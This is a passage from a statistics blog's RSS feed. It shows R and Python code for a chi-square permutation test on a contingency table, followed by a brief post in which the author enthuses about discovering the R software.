hist(x= result.set, main = expression(paste("Histogram of ", X^2, " perm. dist.")))
segments(x0 = statistic, y0 = -10, x1 = statistic, y1 = 10)
#QQ Plot
chi.quant&lt;- qchisq(p= seq(from=1/(B+1), to = 1-1/(B+1), by = 1/(B+1)), df=df)
plot(x= sort(result.set), y = chi.quant, main = expression(paste("QQ-Plot of ", X^2, " perm. dist.")))
abline(a = 0, b = 1)
par(mfrow = c(1,1))
#p-value
mean(result.set&gt;= statistic)
}
#Do.it for 1,000
do.it(data.set = all.data)
B&lt;- 1000
results&lt;- matrix(data = NA, nrow = B, ncol = 1)
set.seed(8067)
for(i in 1:B)    {
results[i,1]&lt;- do.it(all.data)
}
#Observed statistic from the original table
x.sq&lt;- chisq.test(gender.table2, correct = F)
summarize(results, x.sq$statistic, (nrow(gender.table2) - 1) * (ncol(gender.table2)-1), B)</pre>
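<p>If R isn&#8217;t your thing, the same shuffle-and-recompute idea can be sketched in Python. This is an illustration only: the 2x2 table of counts is made up, the function names are hypothetical, and the p-value is simply the share of shuffles whose statistic is at least as large as the observed one.</p>
<pre>
import random
from collections import Counter
from operator import ge

def chi_square(rows, cols):
    """Pearson chi-square statistic for two parallel lists of category codes."""
    n = len(rows)
    row_totals = Counter(rows)
    col_totals = Counter(cols)
    observed = Counter(zip(rows, cols))
    stat = 0.0
    # Sorted keys keep the summation order fixed across shuffles
    for r in sorted(row_totals):
        for c in sorted(col_totals):
            expected = row_totals[r] * col_totals[c] / n
            stat += (observed[(r, c)] - expected) ** 2 / expected
    return stat

def permutation_p_value(rows, cols, n_perm, seed):
    """Return (observed statistic, permutation p-value)."""
    rng = random.Random(seed)
    observed_stat = chi_square(rows, cols)
    shuffled = list(cols)
    hits = 0
    for _ in range(n_perm):
        rng.shuffle(shuffled)  # break any link between rows and cols
        # ge(a, b) is "a is at least as large as b"
        if ge(chi_square(rows, shuffled), observed_stat):
            hits += 1
    return observed_stat, hits / n_perm

# Hypothetical 2x2 table of counts, expanded to one record per respondent
table = [[12, 5], [4, 14]]
rows, cols = [], []
for i, counts in enumerate(table):
    for j, count in enumerate(counts):
        rows.extend([i] * count)
        cols.extend([j] * count)

observed_stat, p_value = permutation_p_value(rows, cols, n_perm=2000, seed=8067)
print(round(observed_stat, 3), p_value)
</pre>
<p>Shuffling only one of the two columns keeps both sets of totals fixed, so every shuffled table is one that could have happened if the two variables really were independent.</p>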
<p><strong>Here&#8217;s the easy way again:</strong><br />
chisq.test(gender.table2, correct=FALSE, simulate.p.value = TRUE, B = 1000)</p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/lesson-of-the-day-permutations-with-r-long-and-short/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>R is not unlike S</title>
		<link>http://jenniepearson.com/r-is-not-unlike-s/</link>
		<comments>http://jenniepearson.com/r-is-not-unlike-s/#comments</comments>
		<pubDate>Tue, 06 Jan 2009 23:12:46 +0000</pubDate>
		<dc:creator>Jennie</dc:creator>
				<category><![CDATA[Statistics]]></category>
		<category><![CDATA[analysis]]></category>
		<category><![CDATA[R]]></category>

		<guid isPermaLink="false">http://jenniepearson.com/?p=39</guid>
		<description><![CDATA[I just heard about this awesome statistical software that doesn&#8217;t cost half my yearly income!
It&#8217;s simply called &#8220;R&#8221; and is part of the GNU project which I had also never heard of but now feel immensely superior to the person I was five minutes ago. They say that R is &#8220;not unlike S&#8221;, which doesn&#8217;t [...]]]></description>
			<content:encoded><![CDATA[<p>I just heard about this awesome statistical software that doesn&#8217;t cost half my yearly income!</p>
<p>It&#8217;s simply called &#8220;R&#8221; and is part of the <a href="http://www.gnu.org/">GNU project</a> which I had also never heard of but now feel immensely superior to the person I was five minutes ago. They say that R is &#8220;not unlike S&#8221;, which doesn&#8217;t mean much to the non-programmer person, but I&#8217;m sure that means something to someone.</p>
<p>Check it out:<br />
<a href="http://www.r-project.org/index.html">The R Project for Statistical Computing!!</a></p>
]]></content:encoded>
			<wfw:commentRss>http://jenniepearson.com/r-is-not-unlike-s/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
